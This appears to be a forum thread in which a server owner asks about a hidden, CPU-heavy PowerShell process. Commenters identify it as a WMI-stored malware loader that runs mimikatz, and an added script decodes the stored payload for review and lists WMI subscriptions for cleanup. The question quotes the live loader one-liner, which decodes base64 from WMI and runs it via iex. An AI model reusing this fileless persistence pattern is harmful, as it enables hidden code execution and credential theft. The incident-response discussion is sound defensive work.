
I'm facing this problem recently:

My server gets very slow. I went to check and saw one instance of PowerShell using a lot of the CPU. I force the task to end, and after some hours it comes back.

The script that is being executed:

```powershell
powershell -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList ($mon, $mon, 'Void', 0, '', '')"
```

Does anyone know what this is and how to stop it from being executed?

Deeh
  • Looking at [this](https://social.technet.microsoft.com/Forums/windows/en-US/de86f13b-74f0-424c-8169-62750d3fe7c4/powershell-high-cpu-end-task-every-90-minutes?forum=winserverpowershell), it's not good. At best it's a leftover from an installation of gateway monitoring software; at worst, it's a trojan. Can you post the output of `([WmiClass] 'root\default:Win32_taskService').Properties['funs'].Value`? – Lieven Keersmaekers Nov 22 '17 at 11:43
  • I don't know much about PowerShell, but I tried using echo and the output is a lot of random characters, really big, it doesn't stop printing on the screen. Some part of it: B4ODcNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFdNSV9jbGllbn – Deeh Nov 22 '17 at 11:47
  • It's base64 encoding. You can decode this wrapping it around `[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(([WmiClass] 'root\default:Win32_taskService').Properties['funs'].Value))` – Lieven Keersmaekers Nov 22 '17 at 11:52
  • Now, random integers are printed with line breaks – Deeh Nov 22 '17 at 12:05
  • Is there any way you can provide the output of following: `([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value` and `([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value` so we can play with it. – Lieven Keersmaekers Nov 22 '17 at 12:10
  • Do you want the full output? It may take a while. – Deeh Nov 22 '17 at 12:21
  • I tried this solution: https://community.spiceworks.com/topic/2080003-malicious-powershell-script-causing-100-cpu-load-solved?page=1#entry-7336947 Apparently, the log reports that the server is clean now, but I'll reboot it soon and see what happens in the next few days. Thanks for your time. – Deeh Nov 22 '17 at 12:40
  • Thanks for the link. Please do reset your passwords. Amongst other things, that script runs mimikatz, which is extremely good at getting passwords from memory. You should assume all passwords are breached. – Lieven Keersmaekers Nov 22 '17 at 12:44
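The comments above walk through pulling the stored `funs` blob out of WMI and base64-decoding it by hand. The following is an added example (not code from the question or the comments) that does the same from a defender's side: it reads the `mon` and `funs` properties of the class named in the posted command, writes the decoded payload to a file for offline review instead of passing it to `iex`, then looks for other custom classes carrying large string blobs and lists permanent WMI event subscriptions, which are a common way such a loader is re-launched after being killed. The output directory and the size threshold are assumptions; run it from an elevated PowerShell session.

```powershell
# Added example, not code from the question or its comments. Extracts the
# payload the posted one-liner reads from WMI, decodes it to disk for review
# (never executes it), and lists other places the loader could be hiding.
# Namespace and class name come from the posted command; run elevated.
$Namespace = 'root\default'
$ClassName = 'Win32_TaskService'
$OutDir    = "$env:TEMP\wmi-review"      # assumed output location
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

function Get-StoredWmiProperty {
    param([string]$Ns, [string]$Class, [string]$Prop)
    try   { ([WmiClass]"${Ns}:${Class}").Properties[$Prop].Value }
    catch { $null }   # class or property missing: nothing stored here
}

# 1. Decode the 'funs' blob exactly as the loader does, but save it instead
#    of handing it to Invoke-Expression (iex).
$funs = Get-StoredWmiProperty $Namespace $ClassName 'funs'
if ($funs) {
    $decoded = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($funs))
    Set-Content -Path "$OutDir\funs.decoded.txt" -Value $decoded -Encoding ASCII
    "funs: {0} base64 chars -> {1} decoded chars saved" -f $funs.Length, $decoded.Length
}
$mon = Get-StoredWmiProperty $Namespace $ClassName 'mon'
if ($mon) { "mon: {0} chars stored" -f ([string]$mon).Length }

# 2. Any other non-system class in the namespace with a large string property
#    is worth a look: the loader may be re-created under a different name.
Get-WmiObject -Namespace $Namespace -List |
  Where-Object { $_.Name -notlike '__*' } |
  ForEach-Object {
    foreach ($p in $_.Properties) {
        if ($p.Type -eq 'String' -and ([string]$p.Value).Length -gt 1024) {
            "{0}.{1}: {2} chars" -f $_.Name, $p.Name, ([string]$p.Value).Length
        }
    }
  }

# 3. Permanent WMI event subscriptions are a common way such a loader is
#    re-launched every few hours; list filters and consumers for review.
Get-WmiObject -Namespace root\subscription -Class __EventFilter |
  Select-Object Name, Query
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer |
  Select-Object Name, CommandLineTemplate
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding |
  Select-Object Filter, Consumer
```

Review the decoded file and the subscription list before removing anything, so that the class, the filter and the consumer are all cleaned up together rather than only the visible process.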

0 Answers